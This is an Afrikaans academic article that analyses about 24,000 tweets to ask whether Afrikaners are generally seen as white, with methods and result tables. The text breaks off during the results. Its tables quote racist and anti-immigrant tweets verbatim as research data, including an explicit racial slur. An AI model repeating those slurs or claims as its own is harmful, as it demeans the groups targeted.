Category Archives: Afrikaans

Ras en Afrikaneretnisiteit: ʼn Kwantitatiewe ondersoek na huidige opvattinge

Dr. Burgert Senekal, Universiteit van die Vrystaat.

Abstract

A lot has been written about whether the Afrikaner is white or of mixed origins. The current study uses big-data methods to investigate what the dominant idea currently is: is the Afrikaner considered to be white? For this all tweets over a period of five months were collected in which the word “afrikaner” occurs, relevant tweets are identified and accessed. By considering the 23 832 tweets published by 14 119 users, it is indicated that more than 99% of users that mentioned race, also mentioned that Afrikaners were white. In addition, it is indicated that more than 41% of users considered race a facet of the Afrikaner’s ethnicity, allowing us to conclude that race is seen as an important component of being an Afrikaner. Suggestions for further research are also made.

Keywords: Afrikaner, Twitter, race, ethnicity, apartheid

Opsomming

Daar is reeds baie geskryf oor of die Afrikaner wit is of ʼn gemengde herkoms het. Die huidige studie gebruik grootdatametodes om ondersoek in te stel na wat die heersende opvatting tans is: word die Afrikaner as wit geag? Hiervoor word alle twiets vanaf Twitter oor ʼn tydperk van vyf maande versamel waarin die woord “afrikaner” voorkom, relevante twiets word geïdentifiseer en word onttrek. Met inagneming van 23 832 twiets wat deur 14 119 gebruikers geplaas is, word aangetoon dat meer as 99% van gebruikers wat ras noem, ook noem dat hulle die Afrikaner as wit ag. Boonop word aangedui dat meer as 41% van die gebruikers ras as ʼn faset van die Afrikaner se etnisiteit noem, wat aandui dat ras gesien word as ʼn belangrike komponent van Afrikanerwees. Voorstelle vir verdere navorsing word ook gemaak.

Kernwoorde: Afrikaner, Twitter, ras, etnisiteit, apartheid

Ensovoort, jaargang 40 (2019), nommer 8: 1

Ras en Afrikaneretnisiteit: ʼn Kwantitatiewe ondersoek na huidige opvattinge

Inhoud

1. Inleiding

2. ʼn Agtergrond van ras, etnisiteit en die Afrikaner

3. Metodes

4. Resultate

5. Gevolgtrekking

 6. Verwysings

7. Addendum 1: Ras duidelik gespesifiseer

8. Addendum 2: Ras nie gespesifiseer nie

1. Inleiding

Die Afrikaner het dwarsdeur 2018 intensiewe ondersoek ondergaan. Die eerste groot gebeurtenis het vroeg in Januarie by Hoërskool Overvaal plaasgevind toe dié skool van rassisme beskuldig is na hulle nie leerlinge wou plaas wat nie Afrikaans magtig is nie (Mitchley, 2018). Grootskaalse betogings deur die Economic Freedom Fighters (EFF) en die African National Congress (ANC) het gevolg, maar uiteindelik het die hof bevind dat die skool nie aan rassisme skuldig was nie (Masinga, 2018).

ʼn Ander groot gebeurtenis het op 28 Februarie plaasgevind toe die Parlement onderneem het om Artikel 25 van die Suid-Afrikaanse grondwet te heroorweeg om die onteiening van eiendom sonder vergoeding te bemiddel. Die diskoers sentreer rondom wit/swart identiteite, dié wat het teenoor dié wat nie het nie, die bevoorregtes teenoor die minderbevoorregtes, die gronddiewe teenoor die onteiendes en die nalatenskap van apartheid – die Afrikaner se oorheersing van die Suid-Afrikaanse politiek van 1948 tot 1994 ((Roelf, 2018) (Mkokeli, 2018) (Osborne, 2018) (Chung, 2018) (Eloff, 2017)). Julius Malema het byvoorbeeld opgemerk: “We must ensure that we restore the dignity of our people without compensating the criminals who stole our land” (Chung, 2018). Op 4 Desember het die Parlement ten gunste van die besluit gestem om die moontlikheid te oorweeg om die grondwet te wysig. Uiteindelik het “onteiening sonder vergoeding” Suid-Afrika se woord van die jaar geword ((Grobler, 2018) (Sekhotho, 2018)).

Saam met die grondkwessie het Afrikaners ook opskrifte gemaak deur talle voorvalle van rassisme en beweerde rassisme. Een van die episodes was die vonnisoplegging van Vicky Momberg vir crimen injuria op 28 Maart nadat sy rassistiese taal gebruik het ((Pijoos, 2018) (Fihlani, 2018) (Ritchie, 2018)). Ná ‘n paar ander voorvalle het die jaar met bewerings van rassisme by Clifton strand geëindig, waarna ‘n skaap opgeoffer is om die strand van rassisme te reinig ((Nombembe, 2018) (Chambers, 2019)).

ʼn Verdere kwessie wat die Afrikaner in die kollig gebring het, was plaasaanvalle. In Mei 2018 het die Afrikaner burgerregte-groep, AfriForum, die VSA besoek om ondersteuning vir die Afrikaner se lot te verkry ((Kriel, 2018) (Du Toit, 2018) (Rademeyer, 2018)). Joernaliste soos Lauren Southern en Katie Hopkins het dokumentêre films gemaak oor plaasaanvalle en die Afrikaner se posisie in Suid-Afrika. Uiteindelik het hierdie media-blootstelling gelei tot ‘n diplomatieke voorval tussen eers die ANC-regering en Australië nadat Peter Dutton, Australië se Minister van Binnelandse Sake, verklaar het dat wit boere in Australië verwelkom moet word ((Gous, 2018) (Killalea, 2018)), en toe tussen die ANC en die VSA (Steinhauser, 2018) nadat die Amerikaanse president, Donald Trump, getwiet het: “I have asked Secretary of State @SecPompeo to closely study the South Africa land and farm seizures and expropriations and the large scale killing of farmers”.

Maar wie is die Afrikaner? Daar is reeds ʼn groot hoeveelheid oor hierdie vraagstuk geskryf, maar die huidige studie gebruik grootdatametodes om ondersoek in te stel na watse persepsies daar tans rondom hierdie vraagstuk bestaan. Hiervoor word gebruik gemaak van Twitter, ʼn sosiale media platform wat dit moontlik maak om ʼn groot hoeveelheid mense se opinies te ontleed en só ʼn beter idee te verkry oor watse algemene persepsies daar by mense bestaan. Die vraag wat gevra word, is: word die Afrikaner oor die algemeen as wit geag? Met ander woorde: Is ras ʼn integrale komponent van Afrikanerwees?

2. ʼn Agtergrond van ras, etnisiteit en die Afrikaner

Collins (2004, p. 13) herinner dat die terme ras en etnisiteit swak gedefinieer is: “Both terms carry complex connotations that reflect culture, history, socioeconomics and political status, as well as a variably important connection to ancestral geographic origins.” Boonop word die terme gereeld afwisselend gebruik, soos byvoorbeeld in Guerrero, et al. (2018), Ailawadhi, et al. (2018), Morisaki, et al. (2017), Jorgenson, et al. (2017) en Ginther, et al. (2011), of verskillend gedefinieer ((Bartlett, 2001, p. 39) (Markus, 2008, p. 653)).

In beide ras- as etnisiteitsbeskrywings is daar ʼn self-etikettering en ʼn etikettering van buite teenwoordig (Buys, 2013): die individu identifiseer homself as behorend tot ʼn spesifieke groep en word oor die algemeen ook as sulks beskou. Bartlett (2001, p. 40) skryf: “Ethnic identity results from a process of labelling (identification). This may be self-labelling, but labelling by others is also involved, since ethnic identity may be contested.” Hy herinner aan Jode wat hulself tydens die Tweede Wêreldoorlog as Duitsers geag het, maar dat die etikettering van buite deurslaggewend was.

Markus (2008, p. 655) is van mening dat ras en etnisiteit geskep word en nie intrinsieke eienskappe van die individu is nie: “Defining race and ethnicity highlights two critical features of both phenomena – other people create them, and they are not biologically based ‘things’ that people ‘have’.” Elders stel Markus haar siening dat ras nie intrinsiek is nie, nog duideliker: “research studies repeatedly show that race and ethnicity are not biologically based” (Markus, 2008, p. 657). Dit is belangrik om Markus (2008) se siening dat ras-gebaseerde identiteit van buite opgelê word in gedagte te hou: Met die implementering van die Bevolkingsregistrasiewet van 1950 in Suid-Afrika is daar byvoorbeeld ʼn onderskeid tussen rasse getref op grond van hoe hulle “oor die algemeen” gesien word ((Zuberi, et al., 2015, pp. 12-13) (Unie van Suid-Afrika, 1950)), met ander woorde hoe hulle van buite beskou word. Die Wet lui byvoorbeeld: “The Governor-General may by proclamation in the Gazette prescribe and define the ethnic or other groups into which coloured persons and natives shall be classified in terms of sub-section (1)” (Unie van Suid-Afrika, 1950).

Indien ras en etnisiteit van buite opgelê word, beteken dit noodwendig dat daar geen intrinsieke kenmerke is wat ʼn persoon tot groep A of B kan klassifiseer nie? Genetiese variasie kan wel gebruik word om ʼn persoon se geografiese herkoms na te spoor ((Rosenberg, et al., 2002) (Greeff, 2007)), wat beteken dat daar tog ʼn biologiese verbintenis tussen ras en etnisiteit is (wat Markus se definisie van etnisiteit hieronder erken), alhoewel dit soms vertroebel is deur die vermenging van bevolkings (Collins, 2004, p. 13). Bartlett (2001, p. 41) skryf:

… there is genetic and biological variation between human groups. Much of this is invisible, but some is highly visible: color of skin, shape of eye, type of hair. These biological differences do not themselves constitute race or ethnicity but are part of the raw materials from which race or ethnicity can be constructed—along with language, religion, political allegiance, economic position, and so on. The significance attached to visible genetic markers varies from society to society—the difference between the meaning of skin color in Brazil and in the Old South being a locus classicus in discussion of such issues.

Kortom: daar bestaan biologiese verskille, maar tot hoe ʼn mate dit bepalend is vir etnisiteit, hang af van die gemeenskap wat kategorieë neerlê. In Suid-Afrika het Heese (1984) en ander byvoorbeeld aangedui dat daar beduidende genetiese vermenging met ander rasse onder Afrikaners bestaan (kyk verderaan), maar ʼn mens sou kon aanvoer dat hierdie genetiese diversiteit irrelevant gemaak is deur die geskiedenis van rasse-klassifikasie waarvoor apartheid en Suid-Afrika bekend is.

Aangesien beide ras as etnisiteit deur die self sowel as van buite bepaal word, bly die vraag: wat onderskei ras van etnisiteit? Markus (2008, p. 654) stel die volgende definisies van ras en etnisiteit voor:

Race is a dynamic set of historically derived and institutionalized ideas and practices that (1) sorts people into ethnic groups according to perceived physical and behavioral human characteristics; (2) associates differential value, power, and privilege with these characteristics and establishes a social status ranking among the different groups; and (3) emerges (a) when groups are perceived to pose a threat (political, economic, or cultural) to each other’s world view or way of life; and/or (b) to justify the denigration and exploitation (past, current, or future) of, and prejudice toward, other groups.

Ethnicity is a dynamic set of historically derived and institutionalized ideas and practices that (1) allows people to identify or to be identified with groupings of people on the basis of presumed (and usually claimed) commonalities including language, history, nation or region of origin, customs, ways of being, religion, names, physical appearance, and/or genealogy or ancestry; (2) can be a source of meaning, action, and identity; and (3) confers a sense of belonging, pride, and motivation.

Die verskil tussen ras en etnisiteit lê met ander woorde volgens Markus nie daarin of fisiese voorkoms bydra tot in- of uitsluiting nie (fisiese verskille maak deel uit van beide ras en etnisiteit, volgens hierdie definisies), maar eerder dat ʼn neerhalende siening en uitbuiting van die ander ʼn komponent van ras is, terwyl etnisiteit positief gesien word as ʼn bron van betekenis, identiteit, ʼn gevoel van behoort en trots. Die skeidslyn, soos die voorafgaande aantoon, is egter vaag.

Fu, He en Hou (2014, p. 2483) stel ʼn eenvoudiger onderskeid tussen ras en etnisiteit voor: “race refers to a person’s physical appearance or characteristics, while ethnicity is more viewed as a culture concept, relating to nationality, rituals and cultural heritages, or even ideology”. Hulle let op navorsing van byvoorbeeld Zhuang en Bradtmiller (2005), Zhuang, et al. (2010), Ball en Molenbroek (2008), Ball, et al. (2010), Hill, et al. (1995) en Xie, et al. (2012), wat – in teenstelling met Markus se bewerings hierbo – wel daarop dui dat fisiese verskille gebruik kan word om ras te onderskei (sien ook Fu, He en Hou (2014) se bibliografie). Hierby sou ʼn mens Trivedi en Amali (2017) en Vo, et al. (2018) en hul bibliografieë kon voeg, wat dui op hoe fisiese verskille in masjienleer gebruik word om tussen rasse te onderskei.

Verskeie studies is in die verlede onderneem wat daarop dui dat die Afrikaner nie ʼn suiwer Europese genetiese samestelling het nie ((Heese, 1971) (Heese, 1979) (Heese, 1984) (Greeff, 2007) (Erasmus, et al., 2015)). Soos Pokahontas in Amerika die stammoeder van President Wilson geword het, het die slavin, Maria Lossee, byvoorbeeld die stammoeder van Presidente Kruger en Steyn geword (Heese, 1979). Boonop is daar die geval van die gemeenskap van swart Afrikaners by Onverwacht, wat na die Anglo-Boereoorlog toegelaat is om grond naby Cullinan te koop en hulself as Afrikaners klassifiseer ((De Vries, 2005) (Rhode, 2012)).

Hierteenoor was daar in die twintigste eeu ʼn poging om die Afrikaner wel as uitsluitlik van Europese herkoms te definieer ((Cloete, 1992) (Giliomee, 2004)). Colenbrander (1964) dui byvoorbeeld daarop dat die Afrikaner se gekleurde komponent minder as 1% van sy samestelling uitmaak. Gedurende die 20ste eeu is die term Afrikaner deur Afrikanernasionaliste geapproprieer om uitsluitlik op ‘wit’ Afrikaanssprekendes te dui ((Giliomee, 2004) (Theunissen, 2015)). Treurnicht (1975, p. 18) skryf byvoorbeeld: “Nooit sedert die volksplanting in 1652 is die gekleurde volksgroepe tot die volksgeledere van die Afrikaner of as deel van die blanke gemeenskap aanvaar nie.”

Ook meer onlangs word die Afrikaner gereeld as ʼn “wit” volk getipeer (Verwey & Quayle, 2012). Malan (2005) verwys na “die gangbare definisie van ‘’n Afrikaner’” as “ʼn blanke Afrikaanssprekende wat die Afrikanerkultuur deel,” en voeg by: “Die hele wêreld aanvaar tans dat Afrikaners blank is” (al verskil hy van hierdie siening). FW de Klerk skryf in sy ode aan Margaret Thatcher (De Klerk, 2013): “how would Afrikaners and other whites be able to retain the right to national self-determination that had been the central theme of their history?” Flip Buys (2013) skryf ook: “verreweg die meeste mense wat hulself as Afrikaners beskou [is] wit.” Solidariteit se Navorsingsinstituut (2018, p. 5) formuleer ʼn werksdefinisie oor die Afrikaner eenvoudig as “mense wat hulle ras as wit en hulle taal as Afrikaans aangee.” Die Cambridge woordeboek is meer eng wanneer hulle Afrikaner beskryf as: “a South African person whose family was originally Dutch and whose first language is Afrikaans,” wat ook soortgelyk is aan die definisie van die Unrepresented Nations and Peoples Organisation (UNPO): “The Afrikaners are descendants of Europeans who arrived in South Africa in the seventeenth century. They speak their own language, Afrikaans, which is derived from Dutch” (UNPO, 2017). In al hierdie gevalle word a) die Afrikaner se herkoms as Europees erken, en b) sy taal as ʼn belangrike komponent van sy etnisiteit erken. Taal, soos die 14de eeuse Skotse historikus, John of Fordun, erken het (Bartlett, 2001, p. 48), speel ʼn belangrike rol in etnisiteit, en dus ook ten opsigte van die Afrikaner.

Die vraag wat egter in die huidige studie aan bod kom, is: wat is die algemene persepsie oor die ras van die Afrikaner? Hoe dit bepaal is, word in die volgende afdeling bespreek.

3. Metodes

In ʼn onlangse verslag dui World Wide Worx (2016) daarop dat die sosiale media platform, Twitter, deur om en by 7.7-milljoen mense in Suid-Afrika gebruik word, wat dit die derde gewildste sosiale media platform in Suid-Afrika na YouTube (8.74-milljoen) en Facebook (14-milljoen) maak. Twitter laat gebruikers toe om kort boodskappe te plaas om hul opinies te lug en is bekend daarvoor dat dit ʼn politieke platform is. Om hierdie rede word Twitter dan ook veral gebruik om mense se opinies te bepaal. Twitter word onder andere gebruik om die opinies van mense tydens en teenoor verkiesings te bepaal ((Tumasjan, et al., 2010) (Wang, et al., 2012)), mense se houdings teenoor projekte (Jiang, et al., 2016), die wêreld se emosionele toestand (Milne, et al., 2015), of mense se houdings teenoor gemeenskappe (Kotzé & Senekal, 2018). Tumasjan, et al. (2010, p. 184) voer aan: “Twitter can be seen as a valid real-time indicator of political sentiment.”

Een van die voordele van ʼn studie van Twitter is dat mense anders reageer wanneer hulle besef hulle word ondersoek (Barge & Endsor, 2014, p. 43), wat beteken dat vraelyste nie altyd mense se ‘ware’ opinies weergee nie maar dalk eerder wat hulle dink hulle moet antwoord (Chamlertwat, et al., 2012, p. 976). ʼn Nadeel is egter dat Twitter nie verteenwoordigend is van die algemene publiek nie (Omand, et al., 2012, p. 810), wat die veralgemeenbaarheid van resultate beperk. Aan die ander kant laat Twitter die navorser toe om ʼn baie groter hoeveelheid mense se opinies te ondersoek as wat tradisionele metodes soos vraelyste toelaat, wat weer die veralgemeenbaarheid van resultate verhoog. In die huidige studie word 14 119 gebruikers se opinies ontleed, wat aansienlik meer is as wat met byvoorbeeld vraelyste ondersoek kan word.

Vir die huidige studie is alle boodskappe (twiets) wat op Twitter geplaas is en waarin die woord “afrikaner” voorkom, versamel. Die datastel strek van 6 November 2018 tot 6 April 2019, dus oor vyf maande en sluit 67 799 twiets en 28 902 unieke twiets in wat deur 24 968 gebruikers geplaas is. Die woord is bo die hutsmerker (#Afrikaner) gekies omdat alle gebruikers nie noodwendig gebruik maak van die hutsmerker nie, en ʼn soektog na die woord tel die hutsmerker op, maar nie andersom nie.

Na die twiets versamel is, is die taal van die twiets geïdentifiseer deur gebruik te maak van Google se Natural Language Processing API. Dit is gedoen omdat twiets in verskeie tale gevind is waarin die woord afrikaner voorkom. Alle twiets is deur dieselfde API in Engels vertaal ten einde die inhoud te kan bepaal wanneer twiets in ʼn taal geplaas is wat die outeur nie magtig is nie (byvoorbeeld Spaans, Sweeds of Italiaans). Hierdie werkswyse is geensins foutloos nie, maar gegewe die volume teks en die feit dat masjienvertalings verstaanbaar is, is daar besluit om nie ʼn menslike vertaler te gebruik nie.

Die woord afrikaner dra verskillende betekenisse in verskillende tale. In Duits, Noorweegs, Deens en Sweeds verwys dit byvoorbeeld na “iemand vanaf Afrika”, terwyl die woord dieselfde betekenis in Spaans en Frans as in Afrikaans of Engels dra. Om te toets of woordeboekdefinisies ooreenstem met die gebruik van die woord afrikaner in verskillende tale, is steekproewe onderneem oor verskeie tale. Tabel 1 dui ʼn aantal voorbeelde uit die huidige datastel aan. Die outomatiese vertaling in Engels word regs verskaf.

Tabel 1 Die gebruik van die woord “afrikaner” in verskillende tale

Taal

Twiet

Engels (masjienvertaling)

Sweeds

Tre afrikaner häktade för gruppvåldtäkt på Södermalm – Nyheter Idag

Three Africans arrested for gang rape in Södermalm – News Today

En vacker och intelligent vit 22-åring tjej med A i alla ämnen blir gruppvåldtagen och mördad av ett gäng svarta afrikaner😡😡😡😭😭 Är det detta ni vill? Är det värt det med massinvandring? Dela om du vill se en förändring!😡 #svpol #migpol #sd2019 #AfS2019

A beautiful and intelligent white 22-year-old girl with A in all subjects are gang-raped and murdered by a gang of black afrikaner😡😡😡😭😭 Is that what you want? Is it worth it to mass immigration? Share if you want to see a change! 😡 #svpol #migpol # sd2019 # AfS2019

Noorweegs

Hvis du aldri har blitt forbanna på den innvandringspolitikken som føres i landet så har du heller aldri lest en personlig fortelling fra ei 15 år gammel jente om hvordan det føles å voldtas med kniv mot strupen av en afrikaner.

If you’ve never been pissed off at the immigration policies pursued in the country you have never read a personal story of a 15 years old girl about how it feels to be raped with a knife at the throat of an African.

Duits

Freiburg Hauptschule … ein Afrikaner schlägt einem Deutschen Schüler das Pausenbrot aus der Hand .. und schlägt Ihm in das Gesicht …. der Deutsche Schüler sagt Zitat : scheiss Neger… und schlägt zurück … Ergebnis ein Schulverweis … er muss such eine neue Schule suchen

Freiburg main school … an African beats a German student’s lunchbox from the hand .. and hits him in the face …. the German student says Quote: fucking nigger … and fighting back … Result an expulsion … he must search to find a new school

Wenn Gott gewollt hätte,dass Europa ein Ort für Afrikaner sei,hätte er sie weiss gemacht.!!!

If God had willed that Europe is a place for Africans, he would have made them white.!!!

Nederlands

Congolese(54) meegelift/carrière gemaakt bij linkse partij in Italië, stapt uit, richt “Afrikaanse partij op alleen voor Afrikanen” met 100%racistisch programma, links juicht

Congolese (54) hitched / career made by left-wing party in Italy, get off, dir “African Party for Africans only” 100% racist program, left cheers

Zo begint de #terreur – en met officiele #toestemming! De kleinste Nederlandse kinderen gaan uitgescholden & belaagd worden op sinterklaasfeestjes. Hoe verschilt dat van belaagde #Afrikaner kleintjes op lagerescholen in #ZuidAfrika? –

Thus begins the #terreur – and with official #toestemming! The smallest Dutch children are abused and attacked to Saint Nicholas parties. How is that different from endangered #Afrikaner children in lower schools #ZuidAfrika? –

Pools

Erytrejczyk i dwaj Somalijczycy aresztowani za gwałt zbiorowy w centrum Sztokholmu

Eritrean and two Somalis arrested for gang rape in central Stockholm

Niemcy. Migrant z Afryki subsaharyjskiej przeciął twarz młodej kobiety nożem tylko dlatego, że nie miała papierosa! Kirchheim Teck 19-letnia kobieta w sobotni wieczór o godzinie 23:15 została poważnie oszpecona nożem.

Germany. Migrant from sub-Saharan Africa cut the face of a young woman with a knife because she did not have a cigarette! Kirchheim Teck 19-year-old woman on Saturday night at 23:15 was severely disfigured knife.

Frans

1/7 des afrikaners vie dans des bidonvilles ( 500 000 ) La politique actuelle est anti blanche. Effectivement il y a un certain pouvoir blanc mais cela ne doit pas de résoudre comme cela . C’est pour ça que je prenne une zone de l’Afrique du sur pour les afrikaner et les coloured

1/7 Afrikaners living in slums (500,000) Current policy is anti white. Sure there are some white power but this does not solve like that. That’s why I take an African area on for Afrikaner and colored

ce matin: Deuxième temps ce mardi de notre série sur l’Afrique du Sud. Aujourd’hui Victor Macé de Lépinay nous guide, en compagnie de ses deux invitées, dans le Voortrekker Monument de Pretoria, lieu symbolique de l’histoire afrikaner.

this morning Second time on Tuesday in our series on South Africa. Today Victor Mace Lépinay to guide us with his two guests in the Voortrekker Monument in Pretoria, symbolic place of Afrikaner history.

Let daarop dat die “afrikaner” betrokke by die verkragting in Södermalm in Swede elders geïdentifiseer is as afkomstig van Somalië en Eritrea. Bostaande voorbeelde toon duidelik aan dat woordeboekdefinisies steeds geldig is: In Duits, Sweeds, Deens en Pools dui die woord op “iemand vanaf Afrika”, terwyl die woord in Frans na ʼn Afrikaanssprekende verwys.

Eenvoudigheidshalwe en ten einde slegs twiets in te sluit wat na die Afrikaner as Afrikaanssprekende verwys, is slegs twiets ingesluit wat in Engels geplaas is. Indien daar volgens taal gefiltreer word, bly daar 23 832 twiets oor wat deur 14 119 gebruikers geplaas is.

Na twiets verwyder is wat nie relevant is vir die huidige studie nie, is kernwoorde geïdentifiseer wat saamhang met ʼn aanduiding dat Afrikaners as wit gesien word. Hierdie woorde is met ʼn deeglike lees van die eerste 5 000 twiets geïdentifiseer en deur middel van steekproewe verder geverifieer. Die woorde white, privilege, Boer, WMC, Holland, Europe, Dutch, thief en black is byvoorbeeld geïdentifiseer as samehangend met ras. Kyk byvoorbeeld na die tien voorbeelde in Tabel 2, wat aandui dat die spreker die Afrikaner as wit ag. Die 15 twiets wat die meeste gedeel is en waarin velkleur gespesifiseer is, word in Addendum 1 verskaf. Die 15 twiets wat die meeste gedeel is en waarin velkleur nie gespesifiseer is nie, word in Addendum 2 verskaf. Twiets word verbatim weergegee.

Tabel 2 Twiets wat saamhang met ras

Twiet

Kernwoord

 1. Round 1 motion of Cape Town WUDC: TH, as South Africa, would forcibly break up exclusive Afrikaner* enclaves. *Afrikaners are a white South African ethnic group descended from predominantly Dutch settlers

white

 1. When an Afrikaner says “Ons” he’s not talking bout any black person.

black

 1. #racism #racist #blacklivesmatter #ChildrensBooks #ChildrenInNeed #Afrikaans #WhitePeople #Afrikaner #ElectionEve #Election2018 Who would let #CHILDREN live like this? We WILL end all #squattercamps in #SouthAfrica by March 2019 PERIOD! SUPPORT US

white

 1. “Afrikaner boys (White men), die poppe sal dans” “The EFF is coming for you” “Pray that the EFF don’t come into power, because if we do…………” #FarmMurders

white

 1. Afrikaner nationalists used the same argument to address the “poor whites question” in 1932. It was known then as the Carnegie Commission. It became better known as “apartheid”.

white

 1. Forgive who? Every white person in Africa is European, whether you’re English or Afrikaner you’re European. We shall pick ourselves up, which is why land expropriation is top of the agenda.

white

 1. While we black South Africans are failing to build a single school that will embrace our own culture. Busy forcing our children in throat of white and Afrikaner schools. While running away from free public schools we created. We are useless kodwa, we don’t invest in education.

black

 1. I don’t care how the world is divided I care about your Genetic makeup, you can call yourselves Afrikaner all day but your DNA is still Dutch

Dutch

 1. ‘Afrikaner’ : a White native of the Republic of South Africa whose mother tongue is Afrikaans. See also ‘Boer’.

white

 1. ” Teach us Black people to trade within ourselves… like you guys do ” – a Black woman to an Afrikaner businessman! I am defeated!!! 😥🤮🤒☹

black

Na sulke kernwoorde geïdentifiseer is, is van ʼn gereelde uitdrukking gebruik gemaak om alle twiets in twee kategorieë te klassifiseer op grond van of die woorde voorkom of nie: stelling dat die Afrikaner wit is/geen stelling dat die Afrikaner wit is nie. Daar is ook ondersoek ingestel na die geskiktheid van masjienleer om boodskappe te klassifiseer, maar aangesien die datastel skeef is (sien resultate hieronder), was masjienleer nie geskik vir die huidige ondersoek nie.

Daar is ook ondersoek ingestel na of mense ontken dat ras ʼn komponent van die Afrikaner se etnisiteit uitmaak. Sulke twiets is moeiliker om op te spoor, maar by nadere ondersoek kon verwysings na Sandra Laing (ʼn meisie wat in 1955 as kleurling geklassifiseer is na albei haar ouers as wit geklassifiseer is) en die woorde actually white en bloodline gebruik word. Voorbeelde van sulke twiets kan in Tabel 3 gesien word. Twiets word verbatim weergegee.

Tabel 3 Twiets wat dui op die Afrikaner se gemengde herkoms

Twiet

Kernwoord

 1. More importantly, and the point of @user’s tweet, is how is black being defined? The Afrikaner bloodline is shown to have as much as 6% “non white” (see @user). Is 6% black enough? 25%? What about 50%? What about Sandra Laing?

Laing

 1. I have long pointed out that the Afrikaner bloodline has a percentage of “black” blood. There’s been shunned as not “black enough”. Now suddenly people who identify as white are being called out as not being white. This country is truly screwed up

bloodline

 1. It’s the same reason why they keep editing out the Wikipedia pages that point out that their Afrikaner heroes like Andries Pretorius who lead the great trek and who Pretoria is named after wasn’t actually white.

Actually white

 1. Francis Galton wrote that genetic recessives reveal itself generation(s) later through differential reproduction. Sandra Laing (1955) was a black girl born to ”white” Afrikaner parents in South Africa. Both parents had genetic recessives.

Laing

Twiets wat ontken dat die Afrikaner wit is, is met behulp van sulke woorde as gemeng geklassifiseer, wat beteken twiets kon nou in drie kategorieë geklassifiseer word:

 1.     aanduiding dat die Afrikaner wit is,
 2.     aanduiding dat die Afrikaner gemeng is,
 3.     geen verwysing na ras nie.

Verder is dit belangrik om te bepaal of ras deur Afrikaners self aan die Afrikaner toegeskryf word en of dit van buite opgelê word. Daar is reeds ʼn groot hoeveelheid navorsing gedoen oor die bepaling van ras deur middel van name (Malmasi & Dras, 2014) (Lee, et al., 2017) (Voicu, 2018). Mislove, Lehmann, Ahn, Onnela en Rosenquist (2011) skakel byvoorbeeld die vanne van Twitter-gebruikers met die VSA se nasionale sensus om gebruikers se ras te bepaal. Hulle (2011, p. 556) noem byvoorbeeld dat die van Meyers in 86% van gevalle na witmense verwys, 9,7% van gevalle na swart Amerikaners, 0,4% van gevalle na Asiate, en in 1,4% van gevalle na mense van Spaanse afkoms. Lee et al. (2017, p. 2081) skryf dat taal die belangrikste maatstaf is om mense se herkoms deur middel van name op te spoor: mense met Duitse name is waarskynlik van Duitse of Oostenrykse afkoms, terwyl mense met Chinese name waarskynlik van Chinese afkoms is. Tweedens moet ʼn mens volgens Lee et al. (2017, p. 2081) ʼn land se geskiedenis in ag neem: die Spaanse kolonialisasie van Mexiko het byvoorbeeld daartoe gelei dat Meksikane oorwegend Spaanse name het.

Lee et al. (2017, p. 2081) se insigte kan op Suid-Afrika van toepassing gemaak word. Taal speel steeds ʼn belangrike rol in Suid-Afrika en mense met Zoeloe, Xhosa of Sotho vanne behoort oorwegend swart te wees, terwyl mense met Afrikaanse vanne meesal wit of kleurling behoort te wees, alhoewel die historiese vermenging van die wit en kleurling bevolking kan veroorsaak dat ʼn onderskeid moeilik is om te tref op grond van Afrikaanse vanne. Omdat taal steeds ʼn belangrike faktor in Suid-Afrika is, maak ek gebruik van Google se Natural Language Processing API om die linguistiese herkoms van gebruikersname te bepaal. Dié metode sal geensins foutloos wees nie, maar kan as ʼn aanduiding gebruik word van wie oor die Afrikaner skryf op Twitter. Neem egter ook in ag dat gebruikers self hul name kan invul, wat beteken dat hulle enige name kan gee.

Die volgende afdeling bespreek die resultate.

4. Resultate

Tabel 4 dui die resultate van die huidige studie aan. Die kategorie wit/gemeng sluit aan by gemeng, maar dui ook aan dat die twiet daarna verwys dat die Afrikaner as wit gesien word. Sulke twiets dui gewoonlik aan dat alhoewel die Afrikaner as wit gesien word, hy inderwaarheid van gemengde herkoms is.

Tabel 4 Engelse twiets oor die Afrikaner (insluitend geen ras genoem nie)

Etniese herkoms

#twiets

%twiets

#gebruikers

%gebruikers

ongedefinieer

13911

58,37

7791

55,18

wit

9899

41,54

6309

44,68

wit / gemeng

21

0,09

18

0,13

gemeng

1

0

1

0,01

Totaal

23832

100

14119

100

Van die 23 832 twiets wat oor die Afrikaner (in die Afrikaanse of Engelse sin van die term) handel, het die woorde white, privilege, Boer, WMC, Holland, Europe, Dutch, thief en black in 9 899 (41,54%) twiets voorgekom. Dit beteken dat 42% van die 23 832 twiets duidelik stel dat hulle die Afrikaner as wit ag. Uit die 14 119 gebruikers het 6 309 (44,68%) gebruikers ook gestel dat hulle die Afrikaner as wit ag. Slegs 22 twiets (0,09%) het gestel dat die Afrikaner as gemeng geag kan word, en dié siening verteenwoordig slegs 19 gebruikers (0,14%). Die res van die twiets het nie uitlatings oor ras gemaak nie.

Die resultate is meer treffend as twiets uit die resultate verwyder word wat geen uitlatings oor ras maak nie. Tabel 5 dui die resultate aan as twiets weggelaat word wat geen uitlatings oor ras maak nie.

Tabel 5 Engelse twiets oor die Afrikaner (uitgesluit geen ras genoem nie)

Etniese herkoms

#twiets

%twiets

#gebruikers

%gebruikers

wit

9899

99,78

6309

99,69

wit / gemeng

21

0,21

18

0,28

gemeng

1

0,01

1

0,02

Totaal

9921

100

6328

99,99

Tabel 5 dui aan dat wanneer ras genoem word, 9 899 twiets (99,8% van twiets) en 99,7% van gebruikers (6 309 gebruikers) die Afrikaner as wit ag, teenoor 0,21% van twiets en 0,3% van gebruikers (19 gebruikers) wat die Afrikaner as gemeng sien.

ʼn Verdere vraag is of Afrikaners self ras ter sprake bring en of ras deur nie-Afrikaners aan die Afrikaner toegeskryf word. Tabel 6 dui die taal van gebruikersname aan wat ras noem (top 10 tale).

Tabel 6 Taal van gebruikersname

Taal van naam

#gebruikers

%gebruikers

Engels

2783

43,81%

Zoeloe

605

9,52%

ongedefinieer

362

5,7%

Afrikaans

286

4,5%

Nederlands

187

2,94%

Sotho

161

2,53%

Frans

110

1,73%

Duits

103

1,62%

Spaans

88

1,39%

Xhosa

87

1,37%

